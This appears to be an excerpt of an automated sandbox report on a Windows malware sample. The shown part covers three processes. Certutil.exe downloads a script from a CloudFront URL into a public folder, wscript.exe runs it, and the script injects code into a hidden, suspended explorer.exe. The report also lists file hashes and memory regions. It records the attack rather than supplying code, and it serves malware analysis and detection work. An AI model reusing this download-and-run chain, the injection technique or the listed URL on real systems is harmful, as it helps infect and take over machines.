setupapi.dll 0x7ffb3c0c0000 0x7ffb3c284fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffb3c290000 0x7ffb3c2c5fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffb3c2d0000 0x7ffb3c375fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffb3c3e0000 0x7ffb3c564fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffb3c570000 0x7ffb3c5d8fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffb3c650000 0x7ffb3c79dfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffb3c950000 0x7ffb3c9aafff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffb3c9b0000 0x7ffb3ca6dfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffb3cb20000 0x7ffb3cc60fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffb3cc70000 0x7ffb3ceebfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x7ffb3cfc0000 0x7ffb3d01afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffb3d020000 0x7ffb3d17bfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
Created Files
Filename File Size Hash Values YARA Match Actions
c:\windows\cercf51.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\ciihmnxmn6ps\appdata\locallow\microsoft\cryptneturlcache\content\0cf27c2989dc9db1c5967c252cccaa32 284.12 KB MD5: a7d292275cc4b1be0a7408fcc4641a54
SHA1: 06136ba4a292a54206c9cdc80d262ebe0859aaab
SHA256: 2dc1e524f8129ec1a18c62b75b5a00f7f3a9f383f7c9e0299c4a5f50453d51ff
False
c:\users\public\en-us.js 284.12 KB MD5: a7d292275cc4b1be0a7408fcc4641a54
SHA1: 06136ba4a292a54206c9cdc80d262ebe0859aaab
SHA256: 2dc1e524f8129ec1a18c62b75b5a00f7f3a9f383f7c9e0299c4a5f50453d51ff
False
c:\users\ciihmnxmn6ps\appdata\locallow\microsoft\cryptneturlcache\metadata\0cf27c2989dc9db1c5967c252cccaa32 0.21 KB MD5: cf7bc666d33cdf89e0292a80599dbc6f
SHA1: 57beed93acdab18424c471f4438e147847b80534
SHA256: a49ddfae6b539c2b9705aa3dc1e61694e768bfb077c789c2295e03f0f02efc6b
False
Threads
Thread 0xce8
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\certutil.exe, base_address = 0x7ff6baf50000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WerSetFlags, address_out = 0x7ffb3d266390 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffb3d27d550 True 1
Fn
File Create Temp File filename = C:\Windows\cerCF51.tmp, path = C:\Windows, prefix = cert True 1
Fn
File Delete filename = C:\Windows\cerCF51.tmp True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:26 (UTC) True 2
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:26 (Local Time) True 1
Fn
Module Get Handle module_name = c:\windows\system32\certca.dll, base_address = 0x7ffb23a70000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\certcli.dll, base_address = 0x7ffb21cd0000 True 1
Fn
Window Create window_name = CertUtil Application, class_name = CertUtil, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\AutoEnrollment False 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
System Get Computer Name type = ComputerNameDnsFullyQualified False 1
Fn
System Get Computer Name result_out = LHnIwsj, type = ComputerNameDnsFullyQualified True 1
Fn
System Get Info type = System Directory True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\cryptnet.dll, base_address = 0x7ffb2dd00000 True 1
Fn
Module Get Address module_name = c:\windows\system32\cryptnet.dll, function = I_CryptNetEnumUrlCacheEntry, address_out = 0x7ffb2dd1a7f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\cryptnet.dll, function = CryptRetrieveObjectByUrlW, address_out = 0x7ffb2dd09ce0 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 19 True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790 True 1
Fn
Inet Open Session user_agent = CertUtil URL Agent, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = dl6zxn23r8r14.cloudfront.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /en-US, flags = INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Accept: */* , url = https://dl6zxn23r8r14.cloudfront.net:443/en-US True 1
Fn
Inet Read Response size = 4096, size_out = 4096 True 71
Fn
Data
Inet Read Response size = 4096, size_out = 126 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
System Open Certificate Store encoding_type = 65537, flags = 0 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 14 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 9 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 51 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 1 True 1
Fn
Data
Module Get Handle module_name = certadm.dll, base_address = 0x0 False 1
Fn
Module Get Handle module_name = c:\windows\system32\certcli.dll, base_address = 0x7ffb21cd0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\certcli.dll, function = DllMain, address_out = 0x7ffb21cda8f0 True 1
Fn
Module Get Handle module_name = certenroll.dll, base_address = 0x0 False 1
Fn
Module Get Handle module_name = c:\windows\system32\certcli.dll, base_address = 0x7ffb21cd0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\certcli.dll, function = DllMain, address_out = 0x7ffb21cda8f0 True 1
Fn
Process #7: wscript.exe
Information Value
ID #7
File Name c:\windows\system32\wscript.exe
Command Line wscript.exe C:\Users\Public\en-US.js
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:45, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:48
OS Process Information
Information Value
PID 0x33c
Parent PID 0xc40 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x250
0x468
0x8B4
0xD80
0x9D8
0xD60
0xCDC
0xD68
0xD64
0xD6C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000020000 0x00020000 0x0003ffff Private Memory - True True False
msvcr80.dll 0x5c920000 0x5c9e8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
pagefile_0x000000ab80000000 0xab80000000 0xab813fffff Pagefile Backed Memory Readable True False False -
private_0x000000ab81400000 0xab81400000 0xab814fffff Private Memory Readable, Writable True True False
private_0x000000ab81500000 0xab81500000 0xab81506fff Private Memory Readable, Writable True True False
private_0x000000ab81510000 0xab81510000 0xab8151ffff Private Memory Readable, Writable True True False
private_0x000000ab81520000 0xab81520000 0xab8161ffff Private Memory Readable, Writable True True False
private_0x000000ab81620000 0xab81620000 0xab8171ffff Private Memory Readable, Writable True True False
private_0x000000ab81720000 0xab81720000 0xab8172ffff Private Memory Readable, Writable True True False
private_0x000000ab81730000 0xab81730000 0xab8192ffff Private Memory Readable, Writable True True False
private_0x000000ab81930000 0xab81930000 0xab81a3afff Private Memory Readable, Writable True True False
private_0x000000ab81930000 0xab81930000 0xab81a56fff Private Memory Readable, Writable True True False
private_0x000000ab81a60000 0xab81a60000 0xab81b5ffff Private Memory Readable, Writable True True False
private_0x000000ab81b60000 0xab81b60000 0xab81c5ffff Private Memory Readable, Writable True True False
private_0x000000ab81c60000 0xab81c60000 0xab81d5ffff Private Memory Readable, Writable True True False
private_0x000000ab81d60000 0xab81d60000 0xab81e4ffff Private Memory Readable, Writable True True False
private_0x000000ab81d60000 0xab81d60000 0xab81d66fff Private Memory Readable, Writable True True False
wscript.exe 0xab81d70000 0xab81d9bfff Memory Mapped File Readable True False False -
pagefile_0x000000ab81d70000 0xab81d70000 0xab81d70fff Pagefile Backed Memory Readable True False False -
private_0x000000ab81d80000 0xab81d80000 0xab81deffff Private Memory Readable, Writable True True False
private_0x000000ab81d80000 0xab81d80000 0xab81d86fff Private Memory Readable, Writable True True False
pagefile_0x000000ab81d90000 0xab81d90000 0xab81d92fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000ab81da0000 0xab81da0000 0xab81da0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000ab81db0000 0xab81db0000 0xab81db0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000ab81dc0000 0xab81dc0000 0xab81dcffff Private Memory Readable, Writable True True False
private_0x000000ab81dc0000 0xab81dc0000 0xab81dcffff Private Memory Readable, Writable True True False
private_0x000000ab81dd0000 0xab81dd0000 0xab81ddffff Private Memory Readable, Writable True True False
private_0x000000ab81de0000 0xab81de0000 0xab81deffff Private Memory Readable, Writable True True False
pagefile_0x000000ab81df0000 0xab81df0000 0xab81df1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000ab81e00000 0xab81e00000 0xab81e00fff Pagefile Backed Memory Readable True False False -
private_0x000000ab81e10000 0xab81e10000 0xab81e1ffff Private Memory Readable, Writable True True False
private_0x000000ab81e20000 0xab81e20000 0xab81e2ffff Private Memory Readable, Writable True True False
private_0x000000ab81e30000 0xab81e30000 0xab81e3ffff Private Memory Readable, Writable True True False
private_0x000000ab81e40000 0xab81e40000 0xab81e4ffff Private Memory Readable, Writable True True False
private_0x000000ab81e50000 0xab81e50000 0xab81ffffff Private Memory Readable, Writable, Executable True True False
private_0x000000ab81e50000 0xab81e50000 0xab81f4ffff Private Memory Readable, Writable True True False
private_0x000000ab81f50000 0xab81f50000 0xab81f5ffff Private Memory Readable, Writable True True False
private_0x000000ab81f60000 0xab81f60000 0xab81f6ffff Private Memory Readable, Writable True True False
private_0x000000ab81f70000 0xab81f70000 0xab81f7ffff Private Memory Readable, Writable True True False
private_0x000000ab81f90000 0xab81f90000 0xab81f9ffff Private Memory Readable, Writable True True False
private_0x000000ab81fb0000 0xab81fb0000 0xab81fbffff Private Memory Readable, Writable True True False
private_0x000000ab81ff0000 0xab81ff0000 0xab81ffffff Private Memory Readable, Writable, Executable True True False
private_0x000000ab82000000 0xab82000000 0xab99ffffff Private Memory Readable, Writable True False False -
private_0x000000ab9a000000 0xab9a000000 0xab9a6cffff Private Memory Readable, Writable True True False
private_0x000000ab9a6d0000 0xab9a6d0000 0xab9a7d7fff Private Memory Readable, Writable True True False
private_0x000000ab9a7e0000 0xab9a7e0000 0xab9a8dffff Private Memory Readable, Writable True True False
kernelbase.dll.mui 0xab9a8e0000 0xab9a9befff Memory Mapped File Readable False False False -
private_0x000000abfe8c0000 0xabfe8c0000 0xabfe8dffff Private Memory Readable, Writable True True False
pagefile_0x000000abfe8c0000 0xabfe8c0000 0xabfe8cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000abfe8d0000 0xabfe8d0000 0xabfe8d6fff Private Memory Readable, Writable True True False
pagefile_0x000000abfe8e0000 0xabfe8e0000 0xabfe8f3fff Pagefile Backed Memory Readable True False False -
private_0x000000abfe900000 0xabfe900000 0xabfe9fffff Private Memory Readable, Writable True True False
pagefile_0x000000abfea00000 0xabfea00000 0xabfea03fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abfea10000 0xabfea10000 0xabfea10fff Pagefile Backed Memory Readable True False False -
private_0x000000abfea20000 0xabfea20000 0xabfea21fff Private Memory Readable, Writable True True False
locale.nls 0xabfea30000 0xabfeaedfff Memory Mapped File Readable False False False -
private_0x000000abfeaf0000 0xabfeaf0000 0xabfebeffff Private Memory Readable, Writable True True False
private_0x000000abfebf0000 0xabfebf0000 0xabfeceffff Private Memory Readable, Writable True True False
private_0x000000abfecf0000 0xabfecf0000 0xabfecf6fff Private Memory Readable, Writable True True False
wscript.exe.mui 0xabfed00000 0xabfed02fff Memory Mapped File Readable False False False -
private_0x000000abfed10000 0xabfed10000 0xabfed10fff Private Memory Readable, Writable True True False
private_0x000000abfed20000 0xabfed20000 0xabfed20fff Private Memory Readable, Writable True True False
wscript.exe 0xabfed30000 0xabfed37fff Memory Mapped File Readable True False False -
private_0x000000abfed40000 0xabfed40000 0xabfee3ffff Private Memory Readable, Writable True True False
private_0x000000abfee40000 0xabfee40000 0xabfee4ffff Private Memory Readable, Writable True True False
pagefile_0x000000abfee50000 0xabfee50000 0xabfefd7fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abfefe0000 0xabfefe0000 0xabff160fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff170000 0xabff170000 0xabff227fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff230000 0xabff230000 0xabff233fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff240000 0xabff240000 0xabff240fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff250000 0xabff250000 0xabff250fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff260000 0xabff260000 0xabff2a7fff Pagefile Backed Memory Readable True False False -
private_0x000000abff2d0000 0xabff2d0000 0xabff2dffff Private Memory Readable, Writable True True False
sortdefault.nls 0xabff2e0000 0xabff616fff Memory Mapped File Readable False False False -
private_0x000000abff620000 0xabff620000 0xabff71ffff Private Memory Readable, Writable True True False
pagefile_0x00007df5ff9d0000 0x7df5ff9d0000 0x7ff5ff9cffff Pagefile Backed Memory - True False False -
private_0x00007ff6bcf30000 0x7ff6bcf30000 0x7ff6bcf3ffff Private Memory Readable, Writable, Executable True True False
private_0x00007ff6bcf40000 0x7ff6bcf40000 0x7ff6bcfcffff Private Memory Readable, Writable, Executable True True False
private_0x00007ff6bcfd6000 0x7ff6bcfd6000 0x7ff6bcfd7fff Private Memory Readable, Writable True True False
private_0x00007ff6bcfd8000 0x7ff6bcfd8000 0x7ff6bcfd9fff Private Memory Readable, Writable True True False
private_0x00007ff6bcfda000 0x7ff6bcfda000 0x7ff6bcfdbfff Private Memory Readable, Writable True True False
private_0x00007ff6bcfdc000 0x7ff6bcfdc000 0x7ff6bcfddfff Private Memory Readable, Writable True True False
private_0x00007ff6bcfde000 0x7ff6bcfde000 0x7ff6bcfdffff Private Memory Readable, Writable True True False
pagefile_0x00007ff6bcfe0000 0x7ff6bcfe0000 0x7ff6bd0dffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6bd0e0000 0x7ff6bd0e0000 0x7ff6bd102fff Pagefile Backed Memory Readable True False False -
private_0x00007ff6bd104000 0x7ff6bd104000 0x7ff6bd105fff Private Memory Readable, Writable True True False
private_0x00007ff6bd106000 0x7ff6bd106000 0x7ff6bd107fff Private Memory Readable, Writable True True False
private_0x00007ff6bd108000 0x7ff6bd108000 0x7ff6bd109fff Private Memory Readable, Writable True True False
private_0x00007ff6bd10a000 0x7ff6bd10a000 0x7ff6bd10bfff Private Memory Readable, Writable True True False
private_0x00007ff6bd10c000 0x7ff6bd10c000 0x7ff6bd10cfff Private Memory Readable, Writable True True False
private_0x00007ff6bd10e000 0x7ff6bd10e000 0x7ff6bd10ffff Private Memory Readable, Writable True True False
wscript.exe 0x7ff6be0b0000 0x7ff6be0ddfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffac3850000 0x7ffac3850000 0x7ffac385ffff Private Memory - True True False
private_0x00007ffac3860000 0x7ffac3860000 0x7ffac386ffff Private Memory - True True False
private_0x00007ffac3870000 0x7ffac3870000 0x7ffac390ffff Private Memory - True True False
private_0x00007ffac3910000 0x7ffac3910000 0x7ffac391ffff Private Memory - True True False
private_0x00007ffac3920000 0x7ffac3920000 0x7ffac398ffff Private Memory - True True False
private_0x00007ffac3990000 0x7ffac3990000 0x7ffac399ffff Private Memory - True True False
private_0x00007ffac39a0000 0x7ffac39a0000 0x7ffac39affff Private Memory - True True False
private_0x00007ffac39b0000 0x7ffac39b0000 0x7ffac39effff Private Memory - True True False
system.xml.ni.dll 0x7ffb20dc0000 0x7ffb21468fff Memory Mapped File Readable, Writable, Executable True False False -
system.ni.dll 0x7ffb21470000 0x7ffb21e9ffff Memory Mapped File Readable, Writable, Executable True False False -
mscorjit.dll 0x7ffb21f40000 0x7ffb220c2fff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x7ffb220d0000 0x7ffb22fadfff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x7ffb22fb0000 0x7ffb2394ffff Memory Mapped File Readable, Writable, Executable True False False -
mscoreei.dll 0x7ffb23950000 0x7ffb239e6fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ffb239f0000 0x7ffb23a57fff Memory Mapped File Readable, Writable, Executable True False False -
jscript.dll 0x7ffb23a60000 0x7ffb23b2dfff Memory Mapped File Readable, Writable, Executable True False False -
comctl32.dll 0x7ffb250c0000 0x7ffb25169fff Memory Mapped File Readable, Writable, Executable False False False -
scrobj.dll 0x7ffb25350000 0x7ffb25393fff Memory Mapped File Readable, Writable, Executable True False False -
wldp.dll 0x7ffb2bea0000 0x7ffb2beaffff Memory Mapped File Readable, Writable, Executable False False False -
wshext.dll 0x7ffb2dce0000 0x7ffb2dcfcfff Memory Mapped File Readable, Writable, Executable True False False -
msisip.dll 0x7ffb2dd00000 0x7ffb2dd0bfff Memory Mapped File Readable, Writable, Executable False False False -
mpoav.dll 0x7ffb2dd10000 0x7ffb2dd2cfff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ffb30c90000 0x7ffb30c9ffff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffb318d0000 0x7ffb318d9fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffb37f40000 0x7ffb37f61fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffb38610000 0x7ffb386a5fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffb39260000 0x7ffb39292fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffb39610000 0x7ffb39626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffb39780000 0x7ffb3978afff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffb39b60000 0x7ffb39b87fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffb39b90000 0x7ffb39bfafff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x7ffb39c00000 0x7ffb39c97fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffb39d40000 0x7ffb39d50fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffb39d60000 0x7ffb39d6efff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffb39d70000 0x7ffb39d82fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffb39d90000 0x7ffb39dd9fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffb39de0000 0x7ffb3a407fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffb3a460000 0x7ffb3a4b3fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffb3a570000 0x7ffb3a622fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffb3a630000 0x7ffb3a7f0fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffb3a9f0000 0x7ffb3aa40fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffb3aa50000 0x7ffb3bf74fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffb3bf80000 0x7ffb3c0a5fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffb3c290000 0x7ffb3c2c5fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffb3c2d0000 0x7ffb3c375fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffb3c3e0000 0x7ffb3c564fff Memory Mapped File Readable, Writable, Executable False False False -
coml2.dll 0x7ffb3c5e0000 0x7ffb3c64efff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffb3c650000 0x7ffb3c79dfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffb3c950000 0x7ffb3c9aafff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffb3c9b0000 0x7ffb3ca6dfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffb3ca70000 0x7ffb3cb14fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffb3cb20000 0x7ffb3cc60fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffb3cc70000 0x7ffb3ceebfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffb3d020000 0x7ffb3d17bfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining entry is omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x250
42 0
Category Operation Information Success Count Logfile
Module Get Filename process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\system32\wscript.exe, size = 260 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffb3a86d460 True 1
Fn
Module Load module_name = amsi.dll, base_address = 0x7ffb30c90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffb30c92260 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffb30c926b0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790 True 1
Fn
COM Create interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Environment Get Environment String name = JS_PROFILER False 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 122109 True 2
Fn
System Get Info type = Operating System True 1
Fn
File Get Info type = size True 1
Fn
File Read size = 290942, size_out = 290942 True 1
Fn
Data
COM Create interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = Hardware Information True 1
Fn
COM Get Class ID cls_id = 9E28EF95-9C6F-3A00-B525-36A76178CC9C, prog_id = System.Text.ASCIIEncoding True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = C1ABB475-F198-39D5-BF8D-330BC7189661, prog_id = System.Security.Cryptography.FromBase64Transform True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = F5E692D9-8A87-349D-9657-F96E5799D2F4, prog_id = System.IO.MemoryStream True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 50369004-DB9A-3A75-BE7A-1D0EF017B9D3, prog_id = System.Runtime.Serialization.Formatters.Binary.BinaryFormatter True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 6896B49D-7AFB-34DC-934E-5ADD38EEEE39, prog_id = System.Collections.ArrayList True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Environment Get Environment String name = ProgramW6432, result_out = C:\Program Files True 1
Fn
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Process Create process_name = C:\Windows\SysWOW64\explorer.exe, os_pid = 0xc84, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Memory Allocate process_name = C:\Windows\SysWOW64\explorer.exe, address = 0x210000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 207872 True 1
Fn
Memory Write process_name = C:\Windows\SysWOW64\explorer.exe, address = 0x210000, size = 207872 True 1
Fn
Data
Thread Create process_name = C:\Windows\SysWOW64\explorer.exe, proc_address = 0x210000, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiUninitialize, address_out = 0x7ffb30c92490 True 1
Fn
Process #8: explorer.exe
418 474
Information Value
ID #8
File Name c:\windows\syswow64\explorer.exe
Command Line "C:\Windows\SysWOW64\explorer.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:48, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:45
OS Process Information
Information Value
PID 0xc84
Parent PID 0x33c (c:\windows\system32\wscript.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xF0
0xC78
0xC70
0xC74
0x9A4
0xDDC
0xE48
0xA90
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000110000 0x00110000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000110000 0x00110000 0x0011ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00123fff Private Memory Readable, Writable True False False -
